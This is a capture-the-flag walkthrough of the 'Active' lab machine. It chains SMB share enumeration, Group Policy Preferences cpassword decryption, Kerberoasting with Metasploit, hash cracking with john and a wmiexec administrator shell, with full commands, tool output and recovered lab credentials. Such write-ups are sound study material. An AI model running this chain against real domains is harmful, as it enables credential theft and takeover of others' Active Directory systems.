Active

Enumeration

Defining a helper variable containing the IP and doing some basic enumeration:

export ip=10.10.10.100
ping $ip # TTL 127 - windows?
nmap -p- $ip # port 
nmap -p- -sC -sV $ip
# Apache http2.4.51

Ports:

Port Service Notes
53 domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
135 msrpc Microsoft Windows RPC
139 netbios-ssn Microsoft Windows netbios-ssn
389 ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445 - microsoft-ds?
464 - kpasswd5?
593 ncacn_http Microsoft Windows RPC over HTTP 1.0
636 tcpwrapped -
3268 ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269 tcpwrapped
5722 msrpc Microsoft Windows RPC
9389 mc-nmf .NET Message Framing
47001 http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152-49155 msrpc Microsoft Windows RPC
49157 ncacn_http Microsoft Windows RPC over HTTP 1.0
49158 msrpc Microsoft Windows RPC
49165 msrpc Microsoft Windows RPC
49168-49169 msrpc Microsoft Windows RPC

samba

Enumerate the samba service with:

enum4linux -a $ip

Shares:

Share Mapping Listing Comment
ADMIN$ DENIED N/A Remote Admin
C$ DENIED N/A Default share
IPC$ OK DENIED Remote IPC
NETLOGON DENIED N/A Logon server share
Replication OK OK -
SYSVOL DENIED N/A Logon server share
Users DENIED N/A -

Checking out the anonymous share:

smbclient //$ip/Replication

mask ""
recurse
prompt
mget *
exit

cd active.htb
ranger

Found an encrypted password in active.htn/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Hash can be decyprted with gpp-decrypt for a credential for user active.htb\SVC_TGS

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# GPPstillStandingStrong2k18

And back to enumeration with the recovered credential:

enum4linux -u SVC_TGS -p GPPstillStandingStrong2k18 -a $ip
enum4linux 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 19 04:40:28 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.100
RID Range ........ 500-550,1000-1050
Username ......... 'SVC_TGS'
Password ......... 'GPPstillStandingStrong2k18'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.100 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.10.100 )================================

Looking up status of 10.10.10.100
No reply from 10.10.10.100

 ===================================( Session Check on 10.10.10.100 )===================================


[+] Server 10.10.10.100 allows sessions using username 'SVC_TGS', password 'GPPstillStandingStrong2k18'


 ================================( Getting domain SID for 10.10.10.100 )================================

Domain Name: ACTIVE
Domain Sid: S-1-5-21-405608879-3187717380-1996298813

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.10.100 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.10.100 from srvinfo: 
	10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
	platform_id     :	500
	os version      :	6.1
	server type     :	0x80102b


 =======================================( Users on 10.10.10.100 )=======================================

index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xeb2 RID: 0x44f acb: 0x00000210 Account: SVC_TGS	Name: SVC_TGS	Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]

 =================================( Share Enumeration on 10.10.10.100 )=================================

do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.100

//10.10.10.100/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_INVALID_PARAMETER listing \*
//10.10.10.100/IPC$	Mapping: N/A Listing: N/A Writing: N/A
//10.10.10.100/NETLOGON	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/Replication	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/Users	Mapping: OK Listing: OK Writing: N/A

 ============================( Password Policy Information for 10.10.10.100 )============================



[+] Attaching to 10.10.10.100 using SVC_TGS:GPPstillStandingStrong2k18

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.10.100)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] ACTIVE
	[+] Builtin

[+] Password Info for Domain: ACTIVE

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000001

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 1

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Enabled
Minimum Password Length: 7


 =======================================( Groups on 10.10.10.100 )=======================================


[+] Getting builtin groups:

group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]

[+]  Getting builtin group memberships:

Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Guests' (RID: 546) has member: ACTIVE\Guest
Group: Guests' (RID: 546) has member: ACTIVE\Domain Guests
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: ACTIVE\Domain Users
Group: Administrators' (RID: 544) has member: ACTIVE\Administrator
Group: Administrators' (RID: 544) has member: ACTIVE\Enterprise Admins
Group: Administrators' (RID: 544) has member: ACTIVE\Domain Admins
Group: IIS_IUSRS' (RID: 568) has member: NT AUTHORITY\IUSR

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Read-only Domain Controllers

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]

[+]  Getting domain group memberships:

Group: 'Enterprise Admins' (RID: 519) has member: ACTIVE\Administrator
Group: 'Schema Admins' (RID: 518) has member: ACTIVE\Administrator
Group: 'Domain Admins' (RID: 512) has member: ACTIVE\Administrator
Group: 'Domain Guests' (RID: 514) has member: ACTIVE\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: ACTIVE\Administrator
Group: 'Domain Users' (RID: 513) has member: ACTIVE\Administrator
Group: 'Domain Users' (RID: 513) has member: ACTIVE\krbtgt
Group: 'Domain Users' (RID: 513) has member: ACTIVE\SVC_TGS
Group: 'Domain Controllers' (RID: 516) has member: ACTIVE\DC$

 ==================( Users on 10.10.10.100 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID: 
S-1-5-21-405608879-3187717380-1996298813

[I] Found new SID: 
S-1-5-21-405608879-3187717380-1996298813

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-21-405608879-3187717380-1996298813 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-21-405608879-3187717380-1996298813-500 ACTIVE\Administrator (Local User)
S-1-5-21-405608879-3187717380-1996298813-501 ACTIVE\Guest (Local User)
S-1-5-21-405608879-3187717380-1996298813-502 ACTIVE\krbtgt (Local User)
S-1-5-21-405608879-3187717380-1996298813-512 ACTIVE\Domain Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-513 ACTIVE\Domain Users (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-514 ACTIVE\Domain Guests (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-515 ACTIVE\Domain Computers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-516 ACTIVE\Domain Controllers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-517 ACTIVE\Cert Publishers (Local Group)
S-1-5-21-405608879-3187717380-1996298813-518 ACTIVE\Schema Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-519 ACTIVE\Enterprise Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-520 ACTIVE\Group Policy Creator Owners (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-521 ACTIVE\Read-only Domain Controllers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-1000 ACTIVE\DC$ (Local User)

[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

[+] Enumerating users using SID S-1-5-21-1621100029-2620511771-2725732389 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-21-1621100029-2620511771-2725732389-500 DC\Administrator (Local User)
S-1-5-21-1621100029-2620511771-2725732389-501 DC\Guest (Local User)
S-1-5-21-1621100029-2620511771-2725732389-513 DC\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-80 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'


 ===============================( Getting printer info for 10.10.10.100 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
Inspecting the report, it's now possible to access the `SYSVOL`, `Users` and `NETLOGON` shares with the credential. 
smbclient //$ip/SYSVOL --user SVC_TGS%GPPstillStandingStrong2k18
# Looks the same as Replication
smbclient //$ip/Users --user SVC_TGS%GPPstillStandingStrong2k18
# user flat found in \SVC_TGS\Desktop\user.txt
smbclient //$ip/NETLOGON --user SVC_TGS%GPPstillStandingStrong2k18.
# empty

Kerberos

msfconsole
use auxiliary/gather/get_user_spns
set rhosts 10.10.10.100
set domain active.htb
set pass GPPstillStandingStrong2k18
set user SVC_TGS
run

This returns a hash, to crack it

echo "\$krb5tgs\$23\$*Administrator\$ACTIVE.HTB\$active.htb/Administrator*\$d11d9dfc6a77c854f016001cd16de94b\$1c398fecd6550a0f682cbad5c7c18a3d64a6a335666be011928cfc6928c6b64fb612d347bbf311a9ffcd0a11d4494c9e6becc29be5c4fe3de649ce0d9ef352202f328e23b5ad18c186b1f690fc54ac4b03ded61606526c4e568ba20c71d418b1c13b3fff7d8dc537975d69cf49176cc0dc32fbbe475f60c620349f524efa301d2510e14a7536d15af71c87b801b26e1cfd8f3d4997247cd32eb65048a564c9abdd361324bd256926ee7dd4d7c1e3233784f88331778cf51e2180bd052e3594523e22fd113ad854472f491580f87513a0ffe111247d01546b6969b5e34207bc73989a02f0d211ceaa4e3bc8252adbb97731b6c5825ece0319af53e8e36d58ef7ade93f660dd452cd15312e6927c56c811f4967c333a39864dc96fa9943f2e339698f0bb0eb0f3de221ca433acd8c5f582531113b540e71b4f0ee9c204186d735aa75b82152274e535786a7fda7acc5286edc175e0724b80114e8b9c2cc09366136556bb36894e4d6268dbd28ad08e987c466e448868ab6ac1b5a4da92e1f3ffb7656ad32024d6107d1a38e79e0884cac92cd8baf8f18bf6ed1637a61ba18619d2f9ae1b370dad4ea3c494fdcd7ce31fe4b791924513ce2b8d2b308e041604f064cf4c24760aac107add2c935455d5e9720e397ddb3b3482abba04b0abcc164ba428a6ae65e986d2566c6eff34a6e32c01c33259fbf8f07b45a6a352a0d4c0112db12d4e78fe1c2cdf3d831ba04574ecf3013393c660efbb114cbb3a35182d7bc10cb05e7806a2a465726cff4257f6ad77d93e766b9761b0ffe16b9230f1a14d20bbf4b93345aaff0bf4c4b97a42e9af46bd3b0acf402d83a2fc976de99522e2291b3321633ae905d2ce3da9745f1b26db515918b1e54ae3d8de988467ded5985403d2a7839c3ec504617ed99cd02328c5e9b36994a820e85ad498d93523fe22415476b1331772aee4c9024ab64c0838d76914193b2cd3a5f9eb26a44c10d3c91122447a1bf1060d73ced26ee46ff834ce521aec95c53d8c7d3a6abd4035f6b25d0b803d95a9cdd11168697dc03f6d2b12bda5dae6bb2266689f5ad0539c6af3c10c9efb06342a31b2d030408a9cf266ae9c51eaac1f9500e0a9018652f2cf74603ac9cf112e7766a71335275e1ae9834ff2379da328ea8791c9cb67b7b05db9d7e480330f738de257d9443c8e51ab36b3f6a6175d96e8b14651dc5fd36feddca6e274383083a9a558abe4349fece379cbd804855cd0582c429883" > /tmp/hash
john /tmp/hash --wordlist=/usr/share/wordlists/rockyou.txt
# Ticketmaster1968

WmiExec

To continue impackets wmiexec can be used to gain a very simple unstable shell

git clone https://github.com/fortra/impacket
cd impacket/examples
./wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100

cd Users
cd Administrator
cd Desktop
lget root.txt
exit
Previous
Next

Last updated on Jul 19, 2023